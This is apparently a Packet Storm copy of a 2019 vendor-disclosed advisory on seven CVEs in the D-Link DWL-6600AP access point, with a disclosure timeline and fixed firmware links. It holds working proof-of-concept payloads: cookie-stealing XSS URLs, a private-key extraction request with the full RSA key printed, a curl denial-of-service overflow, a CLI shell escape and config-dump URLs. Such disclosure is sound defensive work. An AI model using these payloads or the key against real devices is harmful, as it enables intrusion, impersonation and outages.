exploit the possibilities

D-Link 6600-AP XSS / DoS / Information Disclosure

D-Link 6600-AP XSS / DoS / Information Disclosure
Posted Jul 31, 2019
Authored by Sandstorm Security

D-Link 6600-AP suffers from cross site scripting, key extraction, shell escape, config file disclosure, and denial of service vulnerabilities.

tags | exploit, denial of service, shell, vulnerability, xss, info disclosure
advisories | CVE-2019-14332, CVE-2019-14333, CVE-2019-14334, CVE-2019-14335, CVE-2019-14336, CVE-2019-14337, CVE-2019-14338
MD5 | 34d7b01b0cc7b4800d4f8258dd3e8990

D-Link 6600-AP XSS / DoS / Information Disclosure

Change Mirror Download
# Security Advisory - 22/07/2019

## Multiple vulnerabilities found in the D-Link 6600-AP device running
the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced
anymore but the support is still provided by D-Link as per described
on the D-Link website. Not that this product is built for business
customers of D-Link and we can expect to have thousands of devices at
risk. Code base shared with DWL-3600AP and DWL-8610AP

### This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!

### Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP

### Firmware version
4.2.0.14 Revision Ax date: 21/03/2019

### Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

### Product Identifier
WLAN-EAP

### Hardware Version
A2

### Manufacturer
D-LINK

## Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point
for business environments. With high data transmission speeds, load
balancing features, it can be deployed as a standalone wireless Access
Point or used as the foundation for a managed wireless network.
Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

## List of Vulnerabilities

1. CVE-2019-14338 - Post-authenticated XSS
2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private
Key extraction
through http command
3. CVE-2019-14333 - Pre-authenticated Denial of service leading to
the reboot of the AP
4. CVE-2019-14337 - Escape shell in the restricted command line interface
5. CVE-2019-14335 - Post-authenticated Denial of service leading to
the reboot of the AP
6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
7. CVE-2019-14332 - Use of weak ciphers for SSH

### 1. Post-authenticated XSS
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14338
#### Proof-of concept

Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>

Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>

### 2. Post-authenticated Certificate and RSA Private Key extraction
through http command
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14334
#### Proof-of concept

http://10.90.90.91/sslcert-get.cgi?

Result of the command: File "mini_httpd.pem" automatically extracted

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee
Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o
BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B
vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t
7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c
unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk
1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6
J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14
yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z
0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc
fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB
i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb
dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ
OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ
VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9
J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr
H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw
uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy
yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd
pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co
paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8
1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm
fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS
okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px
bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx
MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp
bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL
MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU
MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG
A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE
CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu
OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB
BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp
wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC
I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW
2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK
YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N
29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B
AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS
7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME
9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5
beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE
45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef
MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ==
-----END CERTIFICATE-----

### 3. Pre-authenticated Denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14333
#### Proof-of concept
kali# curl -X POST
'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

### 4. Escape shell in the restricted command line interface
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14337
#### Proof-of concept

DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# `/bin/sh -c wget`
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL

Retrieve files via HTTP or FTP

Options:
-s Spider mode - only check file existence
-c Continue retrieval of aborted transfer
-q Quiet
-P DIR Save to DIR (default .)
-T SEC Network read timeout is SEC seconds
-O FILE Save to FILE ('-' for stdout)
-U STR Use STR for User-Agent header
-Y Use proxy ('on' or 'off')

DLINK-WLAN-AP#

### 5. Post-authenticated Denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14335
#### Proof-of concept

http://10.90.90.91/admin.cgi?action=%s

### 6. Post-authenticated Dump all the config files
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14336
#### Proof-of concept

http://10.90.90.91/admin.cgi?action=

### 7. Use of weak ciphers
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14332
#### Proof-of concept

root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.

DLINK-WLAN-AP# help

## Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this
Report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to mailing list

## Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip


## About me - pwn.sandstorm@gmail.com
#### Independent EMSecurity Researcher in the field of IoT under the Sun
#### Always open to hack and share
#### Greetings - Ack P. Kim and others for the online resources


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    11 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    17 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close